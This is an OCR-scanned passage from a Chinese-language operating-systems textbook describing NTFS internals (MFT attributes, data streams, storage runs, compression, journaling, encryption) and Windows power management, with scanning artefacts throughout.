NTFS 定 义 了 13 个 属性 能 够 出 现在 MFT 记 录 中 。 图 11-40 列 出 了 这 些 属性 。 每 个 属性 头 标识 了 属性 ， 
给 出 了 长 度 、 值 字段 的 位 置 ， 一 些 各 种 各 样 的 标记 和 其 他 信息 。 通 常 ， 属 性 值 直接 跟 在 它们 的 属性 头 后 
面 ， 但 是 如 果 一 个 值 对 于 一 个 MFT 记 录 太 长 的 话 ， 它 可 能 被 放 在 不 同 的 磁盘 块 中 。 这 样 的 属性 称 作 非常 
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驻 属 性 ， 数 据 属性 很 明显 就 是 这 样 一 个 属性 。 一 些 属 性 ， 像 名 字 ， 可 能 出 现 重 复 ， 但 是 所 有 属性 必须 在 


MFT 记 录 中 按照 固定 顺序 出 现 。 常 驻 属性 头 
它们 包含 关于 在 磁盘 上 哪些 位 置 能 找到 这 些 
属性 的 信息 。 安全 描述 符 
标准 的 信息 域 包 含 文件 所 有 者 、 安 全 信 
息 、POSIX 需 要 的 时 间 蕉 、 硬 连接 计数 、 只 
读 和 存档 位 等 。 这 些 域 是 固定 长 度 的 ， 并 且 
总 是 存在 的 。 文 件 名 是 一 个 可 变 长 度 
Unicode 编 码 的 字符 串 。 为 了 使 具有 非 MS- 
DOS 文 件 名 的 文件 可 以 访问 老 的 16 位 程序 ， 
文件 也 可 以 有 一 个 符合 8+3 规 则 的 MS-DOS 
短 名 字 。 如 果实 际 文件 名 符合 8+3 命 名 规则 ， 























第 二 个 MS-DOS 文 件 名 就 不 需要 了 
在 NT4.0 中 ， 安 全 信息 被 放 在 一 个 属性 


中 ,但 在 Windows 2000 及 以 后 的 版 本 中 ， 图 11-40 MFT 记 录 中 使 用 的 属性 
安全 信息 全 部 都 放 在 一 个 单独 的 文件 中 使 得 多 个 文件 可 以 共享 相同 的 安全 描述 。 由 于 安全 信息 对 于 每 个 
用 户 的 许多 文件 来 说 是 相同 的 ， 于 是 这 使 得 许多 MFT 记 录 和 整个 文件 系统 节省 了 大 量 的 空间 。 

当 属 性 不 能 全 部 放 在 MFT 记 录 中 时 , 就 需要 使 用 属性 列表 。 这 个 属性 就 会 说 明 在 哪里 找到 扩展 记录 。 
列表 中 的 每 个 条 目 在 MFT 中 包含 一 个 48 位 的 索引 来 说 明 扩展 记录 在 哪里 ， 还 包含 一 个 16 位 的 序号 来 验证 
扩展 记录 与 基本 记录 是 否 匹 配 。 

就 像 UNIX 文 件 拥有 一 个 I 节 点 号 一 样 ，NTFS 文 件 也 有 一 个 ID。 文 件 可 以 依据 ID 被 打开 ， 但 是 由 于 ID 
是 基于 MEFT 记 录 的 ， 并 且 可 以 因 该 文件 的 记录 移动 (例如 ， 如 果 文 件 因 备份 被 恢复 ) 而 改变 ， 所 以 当 ID 
必须 保持 不 变 时 ， 这 个 NTFS 分 配 的 ID 并 不 总 是 有 用 。NTFS 人 允许 有 一 个 可 以 设置 在 文件 上 而 且 永 远 不 需 
要 改变 的 独立 对 象 四 属性 。 举 例 来 说 ， 当 一 个 文件 被 撕 贝 到 一 个 新 卷 时 ， 这 个 属性 随 着 文件 一 起 过 去 。 

重 解 析 点 告诉 分 析 文 件 名 的 过 程 来 做 特别 的 事 。 这 个 机 制 用 于 显 式 加 载 文件 系统 和 符号 链接 。 两 个 
卷 属性 用 于 标示 卷 。 随 后 三 个 属性 处 理 如 何 实 现 目录 一 一 小 的 目录 就 是 文件 列表 ， 大 的 目录 使 用 B+ 树 实 
现 。 日 志 工 具 流 属性 用 来 加 密 文件 系统 。 

最 后 ， 我 们 关注 最 重要 的 属性 : 数据 流 (在 一 些 情况 下 叫 流 )。 一 个 NTFS 文 件 有 一 个 或 多 个 数据 流 ， 这 
些 就 是 负载 所 在 。 默 认 数据 流 是 未 命名 的 〈 例 如 ， 目 录 路 径 \ 文 件 名 :: $DATA) ， 但 是 替代 数据 流 有 自 
己 的 名 字 ， 例 如 : 目录 路 径 \ 文 件 名 : 流 名 : SDATA, 

对 于 每 个 流 ， 流 的 名 字 (如 果 有 ) 会 在 属性 头 中 。 头 后 面 要 么 是 说 明了 流 包含 哪些 块 的 磁盘 地 址 列 
表 ， 要么 是 仅 几 百 字 节 大 小 的 流 (有 许多 这 样 的 流 ) 本 身 。 存 储 了 实际 流 数据 的 MFT 记 录 称 为 立即 文件 
(Mullender 和 Tanenbaum，1984) 。 

当然 ， 大 多 数 情况 下 ， 数 据 放 不 进 一 个 MFT 记 录 中 ， 因 此 这 个 属性 通常 是 非常 驻 属性 。 现 在 让 我 们 
看 一 看 NTFS 如 何 记 录 特 殊 数 据 中 非常 驻 属 性 的 位 置 。 

2. 存储 分 配 

出 于 效率 的 考虑 ， 磁 盘 块 尽 可 能 地 要 求 连续 分 配 。 举 例 来 说 ， 如 果 一 个 流 的 第 一 个 逻辑 块 放 在 磁盘 
上 的 块 20， 那 么 系统 将 尽量 把 第 二 个 逻辑 块 放 在 块 21， 第 三 个 逻辑 块 放 在 块 22， 以 此 类 推 ， 实 现 这 些 行 
串 的 一 个 方法 是 尽 可 能 一 次 分 配 许多 磁盘 块 。 

一 个 流 中 的 块 是 通过 一 串 记录 描述 的 ， 每 个 记录 描述 了 一 串 逻 辑 上 连续 的 块 ， 对 于 一 个 没有 孔 的 流 
来 说 ， 只 有 唯一 的 一 个 记录 。 按 从 头 到 尾 的 顺序 写 的 流 都 属于 这 一 类 。 对 于 一 个 包含 一 个 孔 的 流 ( 例 如 ， 
只 有 块 0 一 49 和 块 60 一 79 被 定义 了 )， 会 有 两 个 记录 。 这 样 的 流 会 产生 于 先 写 入 前 50 个 块 ， 然 后 找到 逻辑 
上 第 60 块 ， 然 后 写 其 他 20 个 块 。 当 和 孔 被 读 出 时 ， 用 全 堆 表 示 。 有 和 孔 的 文件 称 为 稀疏 文件 。 

每 个 记录 始 于 一 个 头 ， 这 个 头 给 出 第 一 个 块 在 流 中 偏 移 量 。 接 着 是 没有 被 记录 覆盖 的 第 一 个 块 的 偏 
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移 量 。 在 上 面 的 例子 中 ， 第 一 个 记录 有 一 个 〈0，50) 的 头 ， 并 会 提供 这 50 个 块 的 磁盘 地 址 。 第 二 个 记 
录 有 一 个 60，80) 的 头 ， 会 提供 其 他 20 个 块 的 磁盘 地 址 。 
每 个 记录 的 头 后 面 跟着 一 个 或 多 个 对 ， 每 个 对 给 出 了 磁盘 地 址 和 持续 长 度 。 磁 盘 地 址 是 该 磁盘 块 
离 本 分 区 起 点 的 偏 移 量 ， 游程 在 行 串 中 块 的 数量 。 在 一 段 行 串 记 录 中 需要 有 多 少 对 就 可 以 有 多 少 对 。 
图 11-41 描 述 了 用 这 种 方式 表示 的 三 段 、9 块 的 流 。 
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图 11-41 有 3 个 连续 空间 、9 个 块 的 短 流 的 一 条 MFT 记 录 


在 图 11-41 中 ， 有 一 个 9 个 块 ( 头 ，0~8) 的 短 流 的 MFT 记 录 。 它 由 磁盘 上 三 个 行 串 的 连续 块 组 成 。 
第 一 段 是 块 20~~ 23， 第 二 段 是 块 64~ 65， 第 三 段 是 块 80 82。 每 一 个 行 串 被 记录 在 MFT 记 录 中 的 一 个 
(磁盘 地 址 ， 块 计数 ) 对 中 。 有 多 少 行 串 是 依赖 于 当 流 被 创建 时 磁盘 块 分 配器 在 找 连 续 块 的 行 串 时 做 得 
有 多 好 。 对 于 一 个 n 块 的 流 ， 段 数 可 能 是 从 1 到 n 的 任意 值 。 

有 必要 在 这 里 做 几 点 说 明 : 

首先 ， 用 这 种 方法 表达 的 流 的 大 小 没有 上 限 限 制 。 在 地 址 不 压缩 的 情况 下 ， 每 一 对 需要 两 个 64 位 数 
表示 ， 总 共 16 字 节 。 然 而 ， 一 对 能 够 表示 100 万 个 甚至 更 多 的 连续 的 磁盘 块 。 实 际 上 ，20M 的 流 包 含 20 
个 独立 的 由 100 万 个 1KB 块 组 成 的 行 串 ， 每 个 都 可 以 轻易 地 放 在 一 个 MFT 记 录 中 ， 然 而 一 个 60KB 的 被 分 
散 到 60 个 不 同 的 块 的 流 却 不 行 。 

其 次 ,表示 每 一 对 的 直截了当 的 方法 会 占用 2 x 8 个 字 节 ， 有 压缩 方法 可 以 把 一 对 的 大 小 减 小 到 低 于 
16 字 节 。 许 多 磁盘 地 址 有 多 个 高 位 0 字 节 。 这 些 可 以 被 忽略 。 数 据 头 能 告诉 我 们 有 多 少 个 高 位 0 字 节 被 忽 
略 了 ， 也 就 是 说 ， 在 一 个 地 址 中 实际 上 有 多 少 个 字 节 被 用 。 也 可 以 用 其 他 的 压缩 方式 。 实 际 上 ， 一 对 经 
常 只 有 4 个 字 节 。 

第 一 个 例子 是 比较 容易 的 : 所 有 的 文件 信息 能 容纳 在 一 个 MFT 记 录 中 ， 如 果 文 件 比较 大 或 者 是 高 度 
碎片 化 以 至 于 信息 不 能 放 在 一 个 MEFT 记 录 当 中 ， 这 时 会 发 生 什么 呢 ? 答案 很 简单 : 用 两 个 或 更 多 的 MFT 
记录 。 从 图 11-42 可 以 看 出 ， 一 个 文件 的 首 
MFT 记 录 是 102， 对 于 一 个 MFT 记 录 而 言 它 
有 太 多 的 行 串 ， 因 而 它 会 计算 需要 多 少 个 扩 
展 的 MFT 记 录 。 比 如 说 两 个 ， 于 是 会 把 它们 
的 索引 放 到 首 记录 中 ， 首 记录 剩余 的 空间 用 
来 放 前 k 个 行 串 。 

注意 ， 图 11-42 包 含 了 一 些 多 余 的 信息 。 
理论 上 不 需要 指出 一 串 行 串 的 结尾 ， 因 为 这 
些 信息 可 以 从 行 串 对 中 计算 出 来 。 列 出 这 些 
信息 是 为 了 更 有 效 地 搜索 : 找到 在 一 个 给 定 
文件 偏 移 量 的 块 ， 只 需要 去 检查 记录 头 ， 而 不 是 行 串 对 。 

当 MET 记 录 102 中 所 有 的 空间 被 用 完 后 ， 剩 余 的 行 串 继续 在 MFT 记 录 105 中 存放 ， 并 在 这 个 记录 中 





图 11-42 ”需要 三 个 MTF 记 录 存 储 其 所 有 行 串 的 文件 


544 ZU 





放 入 尽 可 能 多 的 项 。 当 这 个 记录 也 用 完 后 ， 剩 下 的 行 串 放 在 MFT 记 录 108 中 。 这 种 方式 可 以 用 多 个 MFT 
记录 去 处 理 大 的 分 段 存储 文件 。 

有 可 能 会 出 现 这 样 的 问题 : 文件 需要 的 MFT 记 录 太 多 ， 以 至 于 首 个 MFT 记 录 中 没有 足够 的 空间 去 
存放 所 有 的 索引 。 解 决 这 个 问题 的 方法 是 : 使 扩展 的 MFT 记 录 列 表 成 为 非 驻 留 的 ( 即 : 存放 在 其 他 的 硬 
盘 区 域 而 不 是 在 首 MFT 记 录 中 )， 这 样 它 就 能 根据 需要 而 增 大 。 

图 11-43 表 示 一 个 MFT 表 项 如 何 描述 一 个 小 目录 。 这 个 记录 包含 若干 目录 项 ， 每 一 个 目录 项 可 以 描 
述 一 个 文件 或 目录 。 每 个 表 项 包含 一 个 定 长 的 结构 体 和 紧 随 其 后 的 不 定 长 的 文件 名 。 定 长 结构 体 包含 该 
文件 对 应 的 MFT 表 项 的 索引 、 文 件 名 长 度 以 及 其 他 的 属性 和 标志 。 在 目录 中 查找 一 个 目录 项 需要 依次 检 
查 所 有 的 文件 名 。 


目录 项 包含 该 文件 对 应 的 MFT 表 项 的 索引 、 文 
标准 信息 头 “索引 根 头 件 名 长 度 、 文 件 名 本 身 以 及 其 他 的 字段 和 标志 


\ = 7 
EMM = 


图 11-43 描述 小 目录 的 MFT 记 录 


大 目录 采用 一 种 不 同 的 格式 ， 即 用 B+ 树 而 不 是 线性 结构 来 列 出 文件 。 通 过 B+ 树 可 以 按照 字母 顺序 
查找 文件 ， 并 且 更 容易 在 目录 的 正确 位 置 插入 新 的 文件 名 。 

现在 有 足够 的 信息 去 描述 使 用 文件 名 对 文件 ?NC:\foo\bar 的 查找 是 如 何 进 行 的 。 从 图 11-20 可 以 知道 
Win32、 原 生 NT 系 统 调 用 、 对 象 和 LO 管理 器 如 何 协作 通过 向 C 盘 的 NTFS 设 备 栈 (device stack) 发 送 I/O 
请 求 打开 一 个 文件 。1/O 请 求 要 求 NTFS 为 剩余 的 路 径 名 \foo\bar 填 写 一 个 文件 对 象 。 

NTFS 从 C 盘 根 目录 开始 分 析 \foo\bar 路 径 ，C 盘 的 块 可 以 在 MFT 中 的 第 五 个 表 项 中 找到 (参考 图 11- 
39) 。 然 后 在 根 目 录 中 查找 字符 串 “foo"”， 返 回 目录 foo 在 MFT 中 的 索引 ， 接 着 再 查找 字符 串 “bar”， 得 
到 这 个 文件 的 MFT 记 录 的 引用 。NTFS 通 过 调用 安全 引用 管理 器 来 实施 访问 检查 ， 如 果 所 有 的 检查 都 通 
过 了 ，NTFS 从 MFT 记 录 中 搜索 得 到 ::$DATA 属 性 ， 即 默认 的 数据 流 。 

找到 文件 bar 后 ，NTFS 在 1/O 管 理 器 返回 的 文件 对 象 上 设置 指针 指向 它 自己 的 元 数据 。 元 数据 包括 
指向 MFT 记 录 的 指针 、 压 缩 和 范围 锁 、 各 种 关于 共享 的 细节 等 。 大 多 数 元 数据 包含 在 一 些 数 据 结构 中 ， 
这 些 数据 结构 被 所 有 引用 这 个 文件 的 文件 对 象 共享 。 有 一 些 域 是 当前 打开 的 文件 特有 的 ， 比 如 当 这 个 文 
件 被 关闭 时 是 否 需要 有 删除。 一旦 文件 成 功 打 开 ，NTFS 调 用 loCompleteRequest， 它 通过 把 IPR 沿 1/O 栈 
向 上 传递 给 IO 和 对 象 管理 器 。 最 终 ， 这 个 文件 对 象 的 句柄 被 放 进 当前 进程 的 句柄 表 中 ， 然 后 回 到 用 户 
态 。 之 后 调用 ReadFile 时 ， 应 用 程序 能 够 提供 句柄 ， 该 句柄 表明 C:\foo\bar 文 件 对 象 应 该 包含 在 传递 到 C: 
设备 栈 给 NTFS 的 读 请 求 中 。 

除了 支持 普通 文件 和 目录 外 ，NTFS 支 持 像 UNIX 那 样 的 硬 连接 ， 也 通过 一 个 叫 作 重 解析 点 的 机 制 支 
持 符号 链接 。NTFS 支 持 把 一 个 文件 或 者 目录 标记 为 一 个 重 解析 点 ， 并 将 其 和 一 块 数据 关联 起 来 。 当 在 文 
件 名 解析 的 过 程 中 遇 到 这 个 文件 或 目录 时 ， 操 作 就 会 失败 ， 这 块 数据 被 返回 到 对 象 管理 器 。 对 象 管理 器 
将 这 块 数据 解释 为 另 一 个 路 径 名 ， 然 后 更 新 需要 解析 的 字符 串 ， 并 重启 IO 操作 。 这 种 机 制 用 来 支持 符号 
链接 和 挂 载 文件 系统 ， 把 文件 搜索 重 定向 到 目录 层次 结构 的 另外 一 个 部 分 甚至 到 另外 一 个 不 同 的 分 区 。 

重 解析 点 也 用 来 为 文件 系统 过 滤器 驱动 程序 标记 个 别 文件 。 在 图 11-20 中 显示 了 文件 系统 过 让 器 如 
何 安装 到 LO 管理 器 和 文件 系统 之 间 。LO 请 求 通过 调用 loCompleteRequest 来 完成 ， 其 把 控制 权 转 交 给 
在 请 求 发 起 时 设备 栈 上 每 个 驱动 程序 插入 到 IRP 中 的 完成 例 程 。 需 要 标记 一 个 文件 的 驱动 程序 首先 关联 
一 个 重 解析 标签 ， 然 后 监控 由 于 遇 到 重 解析 点 而 失败 的 打开 文件 操作 的 完成 请 求 。 通 过 用 IRP 传 回 的 数 
据 块 ， 驱 动 程序 可 以 判断 出 这 是 否 是 一 个 驱动 程序 自身 关联 到 该 文件 的 数据 块 。 如 果 是 ， 驱 动 程序 将 停 
止 处 理 完成 例 程 而 接着 处 理 原来 的 IO 请 求 。 通 常 这 将 引发 一 个 打开 请 求 ， 但 这 时 将 有 一 个 标志 告诉 
NTFS 忽 略 重 解 析 点 并 同时 打开 文件 。 
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3. 文件 压缩 

NTFS 支 持 透 明 的 文件 压缩 。 一 个 文件 能 够 以 压缩 方式 创建 ， 这 意味 着 当 向 磁盘 中 写 入 数据 块 时 
NTFS 会 自动 尝试 去 压缩 这 些 数据 块 ， 当 这 些 数 据 块 被 读 取 时 NTFS 会 自动 解压 。 读 或 写 的 进程 完全 不 知 
道 压缩 和 解压 在 进行 。 

压缩 流程 是 这 样 的 ， 当 NTFS 写 一 个 有 压缩 标志 的 文件 到 磁盘 时 ， 它 检查 这 个 文件 的 前 16 个 逻辑 块 ， 
而 不 管 它们 占用 多 少 个 项 , 然后 对 它们 运行 压缩 算法 , 如果 压缩 后 的 数据 能 够 存放 在 15 个 甚至 更 少 的 块 中 ， 
压缩 数据 将 写 到 硬盘 中 ， 如 果 可 能 的 话 ， 这 些 块 在 一 个 行 串 里 。 如 果 压 缩 后 的 数据 仍然 占用 16 个 块 ， 这 16 
个 块 以 不 压缩 方式 写 到 硬盘 中 。 之 后 ， 去 检查 第 16 一 31 块 看 是 否 能 压缩 到 15 个 甚至 更 少 的 块 ， 以 此 类 推 。 

图 11-44a 显 示 一 个 文件 。 该 文件 的 前 16 块 被 成 功 地 压缩 到 了 8 个 ， 对 第 二 个 16 块 的 压缩 没有 成 功 ， 
第 三 个 16 块 也 压缩 了 50 旬 。 这 三 个 部 分 作为 三 个 行 串 来 写 ， 并 存储 于 MEFT 记 录 中 。“ 丢 失 ” 的 块 用 磁盘 
地 址 0 存放 在 MET 表 项 中 ， 如 图 11-44b 所 示 。 在 图 中 ， 头 (0, 48) 后 面 有 五 个 二 元 组 ， 其 中 ， 两 个 对 应 
着 第 一 个 (被 压缩 ) 行 串 ， 一 个 对 应 没有 压缩 的 行 串 ， 两 个 对 应 最 后 一 个 (被 压缩 ) 行 串 。 


压缩 前 的 文件 





地 址 85 92 


磁盘 


头 文件 AS 
peT E A 人 人 人 








图 11-44 a) 一 个 占 48 块 的 文件 被 压缩 到 32 块 的 例子 ，b) 被 压缩 后 文件 对 应 的 MFT 记 录 


当 读 文 件 时 ，NTFS 需 要 分 辨 某 个 行 串 是 否 被 压缩 过 ， 它 可 以 根据 磁盘 地 址 进行 分 辨 ,如果 其 磁盘 
地 址 是 0， 表 明 它 是 16 个 被 压缩 的 块 的 最 后 部 分 。 为 了 避免 混淆 ， 磁 盘 第 0 块 不 用 于 存储 数据 。 因 为 卷 上 
的 第 0 块 包含 了 引导 遍 区 ， 用 它 来 存储 数据 也 是 不 可 能 的 。 

随机 访问 压缩 文件 也 是 可 行 的 ， 但 是 需要 技巧 。 假 设 一 个 进程 寻找 图 11-44 中 文件 的 第 35 块 ，NTFS 
是 如 何 定位 一 个 压缩 文件 的 第 35 块 区 的 呢 ? 答案 是 NTFS 必 须 首 先 读 取 并 且 解 压 整个 行 串 ， 获 得 第 35 块 
的 位 置 ， 之 后 就 可 以 将 该 块 传 给 读 取 它 的 进程 。 选 择 16 个 块 作为 压缩 单元 是 一 个 折 囊 的 结果 ， 短 了 会 影 
响 压 缩 效 率 ， 长 了 则 会 使 随机 访问 开销 过 大 。 

4. 日 志 

NTFS 支 持 两 种 让 程序 探测 卷 上 文件 和 目录 变化 的 机 制 。 第 一 种 机 制 是 调用 名 为 NtNotifyChange 
Directory File 的 VO 操作 ,传递 一 个 缓冲 区 给 系统 ， 当 系统 探测 到 目录 或 者 子 目 录 树 变化 时 , 该 操作 返回 。 
这 个 IO 操作 的 结果 是 在 缓冲 区 里 填 上 变化 记录 的 一 个 列表 。 缓 冲 区 应 该 足够 大 ， 否 则 填 不 下 的 记录 会 
被 丢弃 。 

第 二 种 机 制 是 NTFS 变 化 日 志 。NTFS 将 卷 上 的 目录 和 文件 的 变化 记录 保存 到 一 个 特殊 文件 中 ， 程 序 
可 以 使 用 特殊 文件 系统 控制 操作 来 读 取 ， 即 调用 API NtFsControlFile 并 以 FSCTL_ QUERY_USN_ 
JOURNAL 为 参数 。 日 志文 件 通 常 很 大 ， 而 且 日 志 中 的 项 在 被 检查 之 前 重用 的 可 能 性 非常 小 。 

j 文件 加 密 

0 今 ， 计 算 机 用 来 存储 很 多 敏感 数据 ,包括 公司 收购 计划 、 税 务 信息 、 情 书 ， 数 据 的 所 有 者 不 想 把 

eee. 但 是 信息 的 泄漏 是 有 可 能 发 生 的 ， 例 如 笔记 本 电脑 的 丢失 或 失窃 ， 使 用 MS- 
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DOS 软 盘 重 起 桌面 系统 来 绕 过 Windows 的 安全 保护 ， 或 者 将 硬盘 从 计算 机 里 移 到 另 一 台 安 装 了 不 安全 操 
作 系 统 的 计算 机 中 。 

Windows 提 供 了 加 密 文件 的 选项 来 解决 这 些 问 题 ， 因 此 当 电 脑 的 失窃 或 用 MS-DOS 重 启 时 ， 文 件 内 
容 是 不 可 读 的 。Windows 加 密 的 通常 方式 是 将 重要 目录 标识 为 加 密 的 ， 然 后 目录 里 的 所 有 文件 都 会 被 加 
密 ， 新 创建 或 移动 到 这 些 目录 来 的 文件 也 会 被 加 密 。 加 密 和 解密 不 是 NTFS 自 己 管理 的 ， 而 是 由 EFS 
(Encryption File System) 驱动 程序 来 管理 ，EFS 作 为 回调 向 NTFS 注 册 。 

EFS 为 特殊 文件 和 目录 提供 加 密 。 在 Windows 中 还 有 另外 一 个 叫 作 BitLocker 的 加 密 工 具 ， 它 加 密 了 
卷 上 几乎 所 有 的 数据 。 只 要 用 户 利 用 强 密 钥 机 制 的 优势 ， 任 何 情况 下 它 都 能 帮助 用 户 保护 数据 。 考 虑 到 
系统 丢失 或 失窃 的 数量 ， 以 及 身份 泄露 的 强烈 敏感 性 ， 确 保 机 密 被 保护 是 非常 重要 的 。 每 天 都 有 惊人 数 
量 的 笔记 本 电脑 丢失 ， 仅 考虑 纽约 市 ， 华 尔 街 大 部 分 公司 平均 一 周 在 出 租车 上 丢失 一 台 笔 记 本 电脑 。 


11.9 Windows 电 源 管 理 


电源 管理 器 集中 管理 整个 系统 的 电源 使 用 。 早 期 的 电源 管理 包括 关闭 显示 器 和 停止 磁盘 旋转 以 降低 
能 量 消耗 。 但 是 ， 我 们 需要 延长 笔记 本 电脑 在 电池 供电 情况 下 的 使 用 时 间 。 我 们 还 会 涉及 长 时 间 无 人 看 
管 运 行 的 桌面 计算 机 的 能 源 节约 ， 以 及 为 现今 存在 的 巨大 的 服务 器 群 提供 能 源 的 昂贵 花费 。 当 我 们 面临 
以 上 问题 时 ， 情 况 迅 速 变 得 复杂 起 来 。 

更 新 一 些 的 电源 管理 设施 可 以 在 系统 没有 被 使 用 的 时 候 ， 通 过 切换 设备 到 后 备 状态 甚至 通过 使 用 软 
电源 开关 (soft power switch) 将 设备 完全 关闭 来 降低 部 件 功 耗 。 在 多 处 理 器 中 ， 可 以 通过 关闭 不 需要 
的 CPU 和 降低 正在 运行 的 CPU 的 频率 来 减少 功 耗 。 当 一 个 处 理 器 空闲 的 时 候 ， 由 于 除了 等 待 中 断 发 生 之 
外 ， 该 处 理 不 需要 做 任何 事情 ， 因 此 它 的 功 耗 也 减少 了 。 

Windows 支 持 一 种 特殊 的 关机 模式 一 一 休眠 ， 该 模式 将 物理 内 存 复 制 到 磁盘 ， 然 后 把 电力 消耗 降低 
到 很 低 的 水 平 笔记本 电脑 在 休眠 状态 下 可 以 运行 儿 个 星期 )， 电 池 的 消耗 也 变 得 十 分 缓慢 。 因 为 所 有 
的 内 存 状态 都 写 和 人 磁盘， 所 以 我 们 其 至 可 以 在 笔记 本 电脑 休眠 的 时 候 为 其 更 换 电池 。 从 休眠 状 态 重新 启 
动 时 ， 系 统 恢复 已 保存 的 内 存 状 态 并 重新 初始 化 设备 。 这 样 计算 机 就 恢复 到 休眠 之 前 的 状态 ， 而 不 需要 
重新 登录 ， 也 不 必 重 新 启动 所 有 休眠 前 正在 运行 的 应 用 程序 和 服务 。Windows 设 法 优化 这 个 过 程 ， 通 过 
忽略 在 磁盘 中 已 备份 而 在 内 存 中 未 被 修改 的 页 面 及 压缩 其 他 内 存 页 面 以 减少 对 IO 操作 的 需求 。 休 了 腿 算 
法 会 自动 调整 它 自身 在 IO 操作 和 处 理 器 吞吐 量 之 间 的 平衡 。 如 果 还 有 其 他 可 用 的 处 理 器 ， 它 会 使 用 日 
贵 但 是 更 加 有 效 的 压缩 策略 来 减少 所 需要 的 IO 操作 。 当 人 允许 足够 的 MO 操作 时 ， 休 了 眠 算法 干脆 会 跳 过 压 
缩 策 略 。 对 于 现 如 今 的 多 处 理 器 机 器 ， 休 眠 和 重启 都 能 在 几 秒 钟 内 就 执行 完成 ， 即 使 系统 在 RAM 上 还 
有 很 多 字 节 。 

另 一 种 可 选择 的 模式 是 待机 模式 ， 电 源 管理 器 将 整个 系统 降 到 最 低 的 功率 状态 ， 仅 使 用 足够 RAM 
刷新 的 功率 。 因 为 不 需要 将 内 存 复制 到 磁盘 ， 所 以 进入 待机 状态 比 进入 休 眼 状态 的 速度 更 快 。 

尽管 休眠 和 待机 是 可 用 的 ， 但 是 许多 用 户 仍然 有 这 样 一 个 习惯 ， 就 是 结束 工作 后 关 掉 计算 机 。 
Windows 使 用 休眠 的 策略 来 执行 伪 关 机 和 伪 开 机 ， 称 为 HiberBoot， 它 比 正常 的 关机 和 开机 要 快 很 多 。 当 
朋 户 执行 系统 关机 指令 时 ，HiberBoot 注 销 用 户 登录 ， 系 统 会 在 他 们 再 次 正常 登录 点 的 位 置 休眠 。 然 后 ， 
当 用 户 再 次 启动 系统 时 ，HiberBoot 会 在 登录 点 的 位 置 重 启 系统 。 对 于 用 户 来 说 ， 就 好 像 关 机 非常 非常 
快 ， 因 为 大 多 系统 初始 化 的 过 程 都 跳 过 了 。 当 然 ， 系 统 为 了 修复 一 个 漏洞 或 者 在 内 核 中 安装 更 新 ， 有 时 
需要 执行 一 次 真正 的 关机 。 如 果 被 执行 的 是 重启 而 不 是 关机 指令 ， 那 么 系统 就 会 真正 关机 然后 执行 正常 
的 启动 。 

对 于 手机 、 平 板 电脑 以 及 最 新 一 代 的 笔记 本 电脑 ， 人 们 希望 这 些 计 算 设 备 始终 是 开 着 的 ， 但 是 只 消 
耗 少 量 的 电能 。 为 了 提供 这 种 体验 ， 现 代 Windows 执 行 一 种 特殊 的 电源 管理 策略 ， 叫 作 连 接待 机 
(Connected Standby，CS)。CS 需 要 使 用 一 种 特殊 的 联网 硬件 ， 这 些 硬件 能 够 用 比 CPU 运 行 少 得 多 的 电源 
在 小 规模 连接 上 监听 传输 。CS 系 统 通常 是 开 着 的 ， 只 要 屏幕 一 被 用 户 启动 就 会 运作 起 来 。CS 与 普通 的 
待机 模式 不 同 ， 因 为 当 系 统 接收 到 被 监控 的 连接 信息 包 时 ，CS 也 会 产生 待机 。 一 旦 电池 电量 过 低 ，CS 
系统 就 会 进入 休眠 状态 以 免 电 池 电 量 完全 耗 尽 ， 这 可 能 会 丢失 用 户 数 据 。 

延长 电池 寿命 不 止 需 要 尽 可 能 地 经 常 关 掉 处 理 器 。 尽 可 能 长 时 间 地 保持 处 理 器 在 关闭 状态 也 是 很 重 
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要 的 。CS 网 络 硬 件 允 许 处 理 器 保持 关闭 状态 直到 接收 数据 ， 但 是 其 他 事件 也 能 导致 处 理 器 重启 开启 。 在 
基于 NT 的 Windows 中 ， 设 备 驱动 、 系 统 服 务 以 及 应 用 程序 自身 经 常 在 没有 特殊 理由 的 情况 下 就 运行 了 ， 
而 且 也 不 是 为 了 检查 什么 。 在 系统 或 者 应 用 程序 中 ， 这 种 轮 询 任 务 经 常 是 基于 设置 定时 器 来 周期 性 地 运 
行 代 码 。 基 于 定时 器 的 轮 询 能 够 产生 打开 进程 的 干扰 事件 ， 为 了 避免 这 种 情况 ， 现 代 Windows 需 要 定时 
器 指定 一 个 不 精准 的 参数 ， 从 而 允许 操作 系统 合并 定时 器 事件 ， 并 减少 在 多 个 处 理 器 中 不 得 不 被 单独 重 
新 打开 的 数量 。Windows 也 正式 确定 了 一 个 未 运行 的 应 用 程序 能 够 在 后 台 执 行 代码 的 条 件 。 例 如 检查 更 
新 或 刷新 内 容 这 样 的 操作 ， 当 定时 器 到 时 它们 不 能 通过 请 求 单独 被 执行 。 应 用 程序 必须 推迟 到 操作 系统 
执行 这 些 后 台 任 务 的 时 候 才 能 运行 。 举 个 例子 ， 检 查 更 新 也 许 一 天 只 发 生 一 次 ， 或 者 在 下 次 设备 连接 电 
池 进 行 充 电 的 时 候 , 一 组 系统 代理 提供 了 许多 条 件 ， 这 些 条 件 在 后 台 任 务 被 执行 时 能 够 被 用 来 进行 限制 。 
如 果 一 个 后 台 任 务 需 要 访问 低 功 耗 的 网 络 或 使 用 一 个 用 户 的 证 书 ， 那 么 这 些 代理 不 会 执行 这 个 任务 ， 直 
到 必要 的 条 件 得 到 了 满足 。 

现在 许多 应 用 程序 能 够 在 本 地 代码 和 云 服 务 上 执行 。Windows 提 供 了 Windows 通 知 服务 
WNS(Windows Notification Service)， 它 允许 第 三 方 服务 在 CS 中 将 通知 推送 到 Windows 设 备 ， 不 再 需要 
CS 网 络 硬 件 特别 监听 来 自 第 三 方 服务 器 的 信息 包 。WNS 能 够 向 时 间 紧 迫 性 事件 发 出 信号 ， 比 如 文本 信 
息 的 到 达 或 者 VoIP 访问 。 当 一 个 WNS 包 到 达 时 ， 不 得 不 打开 处 理 器 来 处 理 它 ， 但 是 CS 网 络 硬件 要 有 区 
分 来 自 不 同 传输 连接 的 能 力 ， 这 就 意味 着 处 理 器 没 必 要 被 每 个 来 自 网 络 接口 的 随机 包 所 唤醒 。 


11.10 Windows 8 中 的 安全 


NT 的 最 初 设计 符合 美国 国防 部 C2 级 安全 需求 (DoD 5200.28-STD) ， 该 橘 皮 书 是 安全 的 DoD 系 统 
必需 满足 的 标准 。 此 标准 要 求 操 作 系统 必须 具备 某 些 特性 才能 认定 对 特定 类 型 的 军事 工作 是 足够 安全 的 。 
虽然 Windows 并 不 是 专 为 满足 C2 兼 容 性 而 设计 的 ， 但 它 从 最 初 的 NT 安全 设计 中 继承 了 很 多 安全 特性 ， 
包括 下 面 的 几 个 : 

